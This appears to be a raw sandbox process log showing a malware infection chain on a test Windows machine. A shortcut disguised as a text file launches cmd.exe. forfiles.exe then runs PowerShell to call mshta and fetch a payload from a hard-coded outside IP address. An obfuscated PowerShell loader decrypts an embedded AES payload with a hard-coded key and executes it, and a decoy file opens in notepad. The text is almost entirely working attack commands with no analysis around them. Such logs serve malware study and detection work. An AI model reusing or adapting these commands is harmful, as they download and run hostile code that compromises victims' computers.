cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "MawDRIycyfS" C:\Users\test22\AppData\Local\Temp\releaseform.txt.lnk
3048forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta http://149.51.230.198:5566/releaseform"
2200powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function jaDxat($JStWEmw){return -split ($JStWEmw -replace '..', '0x$& ')};$trqXPMde = jaDxat('27FC355D932CE7E78C49D6472CF3DAC66B957251BF6EB9E25E8F41E79F5D2FCCAEE2CA5E5FDA84BA2C5D2F0B4890D5229674D034BD819F0FEAA9E4A442213D28DFFC00D4E89940415E84DC18D2EA3282BD555CC445C708872D73FB16755186251740540824E78A3C3FE1FD359F55F3D75338D4AD2C463DA892BF07C0CDFF179C87D422D8ED97B2451BE66EB8B89A8735333649323CC36DA7C561DD8AC93C28D800EA5DE03FCC68AE548ADBF5E7ADEF3083170452A0D9552BC1CA7280CD5337E923D4FA84E204059505CF06233F0D264DCBCD0D0F3BCC5229E0DB09855F33B1CDCA3E1394EC234B28D5FC4A866B6E27C9E5322962AFB4A18D2EED93AAA34E07988EACB7A454E9C66FF5909AB1002AEFB687CBE9FA19894E96A6680BC301C97E200AEDA079B2E3C1B5A1951DEA513E843447ED21C7A0F4792716933EF6DBDB57ECFBC567DD840072161018B05B5C261AAC90436694308B382D9AE920896D677200E868B28065DCB7A7587EE9A2E460A5F977EF38247A03E15873201003DBDDF1EA96239CF304E2093A6CBDE96DCE78BAC3C947FFD66798641E3693E8457AE607F5D613A157D76F4885771B0DEB6520D4BBF0B4E781A6E3C9E262CEED048E7F2C5342B1BD9B373711C3AF0E11F7F0283B1A4E106F7466F8C7F8FEC34ADECD0A63D42FE0B51C4FEE363F8B0D441F0F86AAB0CFA7C552E4DA7AF5FDAB22C02E2E50EE121146EFBE11E7D7D566919DCDF9304C7D966758FD4B303B5C5867F0D8234E6F959F165F324B4D71C760A0CF33A7ADBEE685F20180693E6622C1445DC5A0C5FD9460D0EEF4372C82A53C53E736C219F01AB8AE375D2431C5C4276349C3BF37A4020CACBAFDFC6C01A236739F5C643F2D8CD198B17573C9E8384E3C2E5824C30CA8BD1EFB5AAACC0C89468C009124D7F5DB05A121C520FEF2FC7FA2640C50BEFA3077C964AC6B7E2CA0FC358C0D5999F7143182BC3ECC7C580B396056EA2723C33DD47299EC3CD7748584A780F770F11B05D8FAEF44DC3E54B0126A7A3A77E63478B90A79F8EF09D0C169D55147582662D9D609C3BA9255ACED3A50651073372486C2A990405093CD1DF5FDA60440B732D9EDC0EE0EB8B1915C412EEEF1390EEC7F245891025132C3AE2266286550ECFDFECD1B152F271BCCEDA617CFF96F6F27E8C493481DE9948C827A0D99938D7DD59D0D56266D6C966E1E2867CC071734E76E728FEA2688A524500AD80AF4CE014B78049EC3EE98A7214BC083317FD303AA234292B6A40EA82F1140BD71EF90040B8DE4FF456AE093574C61F200FDD51D0C799259BA436AFC30FFAFD273D82461BD882DEA71F7F2A4E83CE57BFB9F69854B4AC66346B6E06AA7C2369D18AAB07E7C5850DFBE7DFA0DFD97E082ABF35D42A9160D9D072B34DF2F68927F2863DEF8DD0EAA3321CA1DA8DF7BFD32F1E3C3B3933A3D6E8D915BB2F095BFC08D51FB8CE0D6EDBF20743B08BB9E4829046BC40A9129601D41C596BCB291784278DA656A0D8549041702B81954E3B85FC836A421E03179EF743DCCAB5DAD1579BE53D5E31C13EEADB1E75146DCF805800D59C091ADD3F8A70447B2DB60B9AC08A1ABD2FB546E6382AF4F29787067AB4318D9D04B2F3BC0C3FDE146E0BC645DFB2C4A82203848804DAECF4AD130B9B48E3D0217DF979FB4BE233BB7A695B33E033E9881BAF607255A8C53106B4D3999875C68E449D65DF10D5DC1791096F90E8AFE9F1237ED');$EmUyi = [System.Security.Cryptography.Aes]::Create();$EmUyi.Key = jaDxat('6F766857644E4F6674514E6773586466');$EmUyi.IV = New-Object byte[] 16;$SwqHKOBA = $EmUyi.CreateDecryptor();$wGojPnmot = $SwqHKOBA.TransformFinalBlock($trqXPMde, 0, $trqXPMde.Length);$AmROsIjol = [System.Text.Encoding]::Utf8.GetString($wGojPnmot);$SwqHKOBA.Dispose();& $AmROsIjol.Substring(0,3) $AmROsIjol.Substring(3)
284notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\test22\AppData\Roaming\config.txt
1020